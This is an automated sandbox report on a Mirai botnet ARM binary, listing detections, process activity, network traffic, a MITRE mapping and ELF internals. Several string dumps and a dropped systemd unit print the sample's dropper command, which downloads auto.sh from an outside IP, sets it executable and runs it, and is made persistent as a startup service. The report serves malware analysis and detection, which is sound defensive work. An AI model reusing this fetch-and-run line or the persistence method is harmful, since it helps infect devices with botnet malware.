Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm7.elf

Overview

General Information

Sample name:arm7.elf
Analysis ID:1585013
MD5:b650efbe5d301336e171f76ac6854af1
SHA1:8453546c4a920f65315a046b6579c89cdffbf8e5
SHA256:f926f3e5ca5b14237b37cbfd2a2d8653ed67a965f39566d5b12974b272b6c4b5
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample deletes itself
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1585013
Start date and time:2025-01-07 00:43:20 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm7.elf
Detection:MAL
Classification:mal68.troj.evad.linELF@0/3@51/0
  • VT rate limit hit for: arm7.elf
Command:/tmp/arm7.elf
PID:5460
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • arm7.elf (PID: 5460, Parent: 5384, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7.elf
    • arm7.elf New Fork (PID: 5462, Parent: 5460)
      • arm7.elf New Fork (PID: 5464, Parent: 5462)
      • arm7.elf New Fork (PID: 5465, Parent: 5462)
        • arm7.elf New Fork (PID: 5470, Parent: 5465)
      • arm7.elf New Fork (PID: 5468, Parent: 5462)
      • sh (PID: 5468, Parent: 5462, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 5472, Parent: 5468)
        • systemctl (PID: 5472, Parent: 5468, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • arm7.elf New Fork (PID: 5476, Parent: 5462)
      • sh (PID: 5476, Parent: 5462, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 5478, Parent: 5476)
        • systemctl (PID: 5478, Parent: 5476, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 5474, Parent: 5473)
  • snapd-env-generator (PID: 5474, Parent: 5473, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5480, Parent: 5479)
  • snapd-env-generator (PID: 5480, Parent: 5479, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: arm7.elfAvira: detected
    Source: arm7.elfReversingLabs: Detection: 47%
    Source: arm7.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
    Source: arm7.elfString: /proc//exe%s/%s/proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
    Source: arm7.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
    Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)
    Source: /tmp/arm7.elf (PID: 5460)Socket: 127.0.0.1:39123Jump to behavior
    Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
    Source: unknownDNS traffic detected: query: tcpdown.suo replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: tcpdown.su@ replaycode: Name error (3)
    Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
    Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: tcpdown.su@
    Source: global trafficDNS traffic detected: DNS query: tcpdown.suo
    Source: global trafficDNS traffic detected: DNS query: tcpdown.su
    Source: startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh
    Source: arm7.elf, startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh;
    Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443
    Source: arm7.elfELF static info symbol of initial sample: __gnu_unwind_execute
    Source: Initial sampleString containing 'busybox' found: busybox
    Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
    Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
    Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
    Source: classification engineClassification label: mal68.troj.evad.linELF@0/3@51/0
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/11/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/22/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/55/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/66/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/88/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/99/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/111/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/222/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/333/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/777/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/888/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/11111/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)File opened: /proc/999/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/11/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/22/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/33/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/55/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/88/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/99/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/111/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/222/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/333/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/777/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/888/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/11111/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5465)File opened: /proc/999/cmdlineJump to behavior
    Source: /tmp/arm7.elf (PID: 5468)Shell command executed: /bin/sh -c "systemctl daemon-reload"Jump to behavior
    Source: /tmp/arm7.elf (PID: 5476)Shell command executed: /bin/sh -c "systemctl enable startup_command.service"Jump to behavior
    Source: /bin/sh (PID: 5472)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
    Source: /bin/sh (PID: 5478)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/arm7.elf (PID: 5460)File: /tmp/arm7.elfJump to behavior
    Source: /tmp/arm7.elf (PID: 5460)Queries kernel information via 'uname': Jump to behavior
    Source: arm7.elf, 5460.1.0000558aaf5e9000.0000558aaf73a000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
    Source: arm7.elf, 5460.1.0000558aaf5e9000.0000558aaf73a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
    Source: arm7.elf, 5460.1.00007fff60074000.00007fff60095000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
    Source: arm7.elf, 5460.1.00007fff60074000.00007fff60095000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: arm7.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: arm7.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information2
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Systemd Service
    1
    Systemd Service
    1
    Masquerading
    1
    OS Credential Dumping
    11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job2
    Scripting
    Boot or Logon Initialization Scripts1
    File Deletion
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585013 Sample: arm7.elf Startdate: 07/01/2025 Architecture: LINUX Score: 68 32 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->32 34 tcpdown.suo 2->34 36 2 other IPs or domains 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Mirai 2->42 9 arm7.elf 2->9         started        12 systemd snapd-env-generator 2->12         started        14 systemd snapd-env-generator 2->14         started        signatures3 process4 signatures5 44 Sample deletes itself 9->44 16 arm7.elf 9->16         started        process6 process7 18 arm7.elf sh 16->18         started        20 arm7.elf sh 16->20         started        22 arm7.elf 16->22         started        24 arm7.elf 16->24         started        process8 26 sh systemctl 18->26         started        28 sh systemctl 20->28         started        30 arm7.elf 22->30         started       
    SourceDetectionScannerLabelLink
    arm7.elf47%ReversingLabsLinux.Backdoor.Mirai
    arm7.elf100%AviraEXP/ELF.Mirai.W
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://154.216.20.138/auto.sh0%Avira URL Cloudsafe
    http://154.216.20.138/auto.sh;0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    tcpdown.su@
    unknown
    unknownfalse
      unknown
      tcpdown.suo
      unknown
      unknownfalse
        unknown
        tcpdown.su
        unknown
        unknownfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.20.138/auto.sh;arm7.elf, startup_command.service.13.drfalse
          • Avira URL Cloud: safe
          unknown
          http://154.216.20.138/auto.shstartup_command.service.13.drfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.125.190.26
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.125.190.26m68k.elfGet hashmaliciousUnknownBrowse
            wev86.elfGet hashmaliciousUnknownBrowse
              main_mpsl.elfGet hashmaliciousMiraiBrowse
                main_arm7.elfGet hashmaliciousMiraiBrowse
                  wind.arm5.elfGet hashmaliciousMiraiBrowse
                    wind.mips.elfGet hashmaliciousMiraiBrowse
                      boatnet.x86.elfGet hashmaliciousMiraiBrowse
                        arm7.elfGet hashmaliciousMiraiBrowse
                          arm5.elfGet hashmaliciousMiraiBrowse
                            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CANONICAL-ASGBm68k.elfGet hashmaliciousUnknownBrowse
                              • 185.125.190.26
                              i686.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              i586.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              wev86.elfGet hashmaliciousUnknownBrowse
                              • 185.125.190.26
                              gnjqwpc.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              na.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              Aqua.sh4.elfGet hashmaliciousMiraiBrowse
                              • 91.189.91.42
                              res.x86.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              main_arm5.elfGet hashmaliciousMiraiBrowse
                              • 91.189.91.42
                              main_mips.elfGet hashmaliciousMiraiBrowse
                              • 91.189.91.42
                              No context
                              No context
                              Process:/tmp/arm7.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):361
                              Entropy (8bit):5.16738909970438
                              Encrypted:false
                              SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXbcCmBNcCm4RcCmO/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXIpiQuj73GLHWrv
                              MD5:AF7D62B73266E0B457B114FE91F7E926
                              SHA1:11261AEF4573B56B67B32020049C69C7282FC212
                              SHA-256:14CB525E5A6B8AAF20C38672F8A9F974A684990888214848818326A739906642
                              SHA-512:3926FBB53496C3AAA34CC782BD5C8379E0AB94B11FE4E63BBBFEAC4E2B5057369C94BBE25AC56C3F04363076C91B978F9199FED97C5ED8377A6DC852B01EBFD9
                              Malicious:false
                              Reputation:low
                              Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.
                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):76
                              Entropy (8bit):3.7627880354948586
                              Encrypted:false
                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                              File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
                              Entropy (8bit):5.847473853906099
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:arm7.elf
                              File size:172'069 bytes
                              MD5:b650efbe5d301336e171f76ac6854af1
                              SHA1:8453546c4a920f65315a046b6579c89cdffbf8e5
                              SHA256:f926f3e5ca5b14237b37cbfd2a2d8653ed67a965f39566d5b12974b272b6c4b5
                              SHA512:feab3f5f386d678ce1cc8ab2fce9234b048e6b2c0367397826b6c5359accf52945f8c9b2164763887d42f3b819019da8e9b5a39321c4d7790a26f0677912f2d4
                              SSDEEP:3072:8qwG+C1QT6mXRfDUnhaRkZzOQEfcl/lawSosRMD27WOagM/9regU9:8qwG1mBf4haRkZzOQE0l/Qw0q27WOhMA
                              TLSH:B2F33C46EA814B13C4D62776B6EF42453323AB64D3EB330699187FB43F8679E0E63505
                              File Content Preview:.ELF..............(.........4...8.......4. ...(........p8...8...8... ... ...........................X...X...............................H...........................................Q.td..................................-...L..................@-.,@...0....S

                              ELF header

                              Class:ELF32
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:ARM
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:UNIX - System V
                              ABI Version:0
                              Entry Point Address:0x8194
                              Flags:0x4000002
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:5
                              Section Header Offset:134456
                              Section Header Size:40
                              Number of Section Headers:29
                              Header String Table Index:26
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x80d40xd40x100x00x6AX004
                              .textPROGBITS0x80f00xf00x16d0c0x00x6AX0016
                              .finiPROGBITS0x1edfc0x16dfc0x100x00x6AX004
                              .rodataPROGBITS0x1ee100x16e100x2b100x00x2A008
                              .ARM.extabPROGBITS0x219200x199200x180x00x2A004
                              .ARM.exidxARM_EXIDX0x219380x199380x1200x00x82AL204
                              .eh_framePROGBITS0x2a0000x1a0000x40x00x3WA004
                              .tbssNOBITS0x2a0040x1a0040x80x00x403WAT004
                              .init_arrayINIT_ARRAY0x2a0040x1a0040x40x00x3WA004
                              .fini_arrayFINI_ARRAY0x2a0080x1a0080x40x00x3WA004
                              .jcrPROGBITS0x2a00c0x1a00c0x40x00x3WA004
                              .gotPROGBITS0x2a0100x1a0100xa80x40x3WA004
                              .dataPROGBITS0x2a0b80x1a0b80x2600x00x3WA004
                              .bssNOBITS0x2a3180x1a3180xf5300x00x3WA008
                              .commentPROGBITS0x00x1a3180xd960x00x0001
                              .debug_arangesPROGBITS0x00x1b0b00x1400x00x0008
                              .debug_pubnamesPROGBITS0x00x1b1f00x2130x00x0001
                              .debug_infoPROGBITS0x00x1b4030x20430x00x0001
                              .debug_abbrevPROGBITS0x00x1d4460x6e20x00x0001
                              .debug_linePROGBITS0x00x1db280xe760x00x0001
                              .debug_framePROGBITS0x00x1e9a00x2b80x00x0004
                              .debug_strPROGBITS0x00x1ec580x8ca0x10x30MS001
                              .debug_locPROGBITS0x00x1f5220x118f0x00x0001
                              .debug_rangesPROGBITS0x00x206b10x5580x00x0001
                              .ARM.attributesARM_ATTRIBUTES0x00x20c090x160x00x0001
                              .shstrtabSTRTAB0x00x20c1f0x1170x00x0001
                              .symtabSYMTAB0x00x211c00x5fc00x100x0288754
                              .strtabSTRTAB0x00x271800x2ea50x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              EXIDX0x199380x219380x219380x1200x1204.50400x4R 0x4.ARM.exidx
                              LOAD0x00x80000x80000x19a580x19a585.97110x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                              LOAD0x1a0000x2a0000x2a0000x3180xf8483.99030x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                              TLS0x1a0040x2a0040x2a0040x00x80.00000x4R 0x4.tbss
                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                              NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                              .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              .symtab0x80d40SECTION<unknown>DEFAULT1
                              .symtab0x80f00SECTION<unknown>DEFAULT2
                              .symtab0x1edfc0SECTION<unknown>DEFAULT3
                              .symtab0x1ee100SECTION<unknown>DEFAULT4
                              .symtab0x219200SECTION<unknown>DEFAULT5
                              .symtab0x219380SECTION<unknown>DEFAULT6
                              .symtab0x2a0000SECTION<unknown>DEFAULT7
                              .symtab0x2a0040SECTION<unknown>DEFAULT8
                              .symtab0x2a0040SECTION<unknown>DEFAULT9
                              .symtab0x2a0080SECTION<unknown>DEFAULT10
                              .symtab0x2a00c0SECTION<unknown>DEFAULT11
                              .symtab0x2a0100SECTION<unknown>DEFAULT12
                              .symtab0x2a0b80SECTION<unknown>DEFAULT13
                              .symtab0x2a3180SECTION<unknown>DEFAULT14
                              .symtab0x00SECTION<unknown>DEFAULT15
                              .symtab0x00SECTION<unknown>DEFAULT16
                              .symtab0x00SECTION<unknown>DEFAULT17
                              .symtab0x00SECTION<unknown>DEFAULT18
                              .symtab0x00SECTION<unknown>DEFAULT19
                              .symtab0x00SECTION<unknown>DEFAULT20
                              .symtab0x00SECTION<unknown>DEFAULT21
                              .symtab0x00SECTION<unknown>DEFAULT22
                              .symtab0x00SECTION<unknown>DEFAULT23
                              .symtab0x00SECTION<unknown>DEFAULT24
                              .symtab0x00SECTION<unknown>DEFAULT25
                              $a.symtab0x80d40NOTYPE<unknown>DEFAULT1
                              $a.symtab0x1edfc0NOTYPE<unknown>DEFAULT3
                              $a.symtab0x80e00NOTYPE<unknown>DEFAULT1
                              $a.symtab0x1ee080NOTYPE<unknown>DEFAULT3
                              $a.symtab0x80f00NOTYPE<unknown>DEFAULT2
                              $a.symtab0x81340NOTYPE<unknown>DEFAULT2
                              $a.symtab0x81940NOTYPE<unknown>DEFAULT2
                              $a.symtab0x81d00NOTYPE<unknown>DEFAULT2
                              $a.symtab0x82cc0NOTYPE<unknown>DEFAULT2
                              $a.symtab0x84240NOTYPE<unknown>DEFAULT2
                              $a.symtab0x86400NOTYPE<unknown>DEFAULT2
                              $a.symtab0x86ac0NOTYPE<unknown>DEFAULT2
                              $a.symtab0x871c0NOTYPE<unknown>DEFAULT2
                              $a.symtab0x8c400NOTYPE<unknown>DEFAULT2
                              $a.symtab0x92d40NOTYPE<unknown>DEFAULT2
                              $a.symtab0x98f00NOTYPE<unknown>DEFAULT2
                              $a.symtab0x9b900NOTYPE<unknown>DEFAULT2
                              $a.symtab0xa3440NOTYPE<unknown>DEFAULT2
                              $a.symtab0xaa3c0NOTYPE<unknown>DEFAULT2
                              $a.symtab0xb0e80NOTYPE<unknown>DEFAULT2
                              $a.symtab0xb7e00NOTYPE<unknown>DEFAULT2
                              $a.symtab0xbe940NOTYPE<unknown>DEFAULT2
                              $a.symtab0xc1f00NOTYPE<unknown>DEFAULT2
                              $a.symtab0xc5480NOTYPE<unknown>DEFAULT2
                              $a.symtab0xc7e80NOTYPE<unknown>DEFAULT2
                              $a.symtab0xca140NOTYPE<unknown>DEFAULT2
                              $a.symtab0xce4c0NOTYPE<unknown>DEFAULT2
                              $a.symtab0xd3380NOTYPE<unknown>DEFAULT2
                              $a.symtab0xdc0c0NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe1e80NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe2380NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe2dc0NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe4900NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe5940NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe8340NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe9280NOTYPE<unknown>DEFAULT2
                              $a.symtab0xe9e40NOTYPE<unknown>DEFAULT2
                              $a.symtab0xeaf80NOTYPE<unknown>DEFAULT2
                              $a.symtab0xebf40NOTYPE<unknown>DEFAULT2
                              $a.symtab0xee640NOTYPE<unknown>DEFAULT2
                              $a.symtab0xee7c0NOTYPE<unknown>DEFAULT2
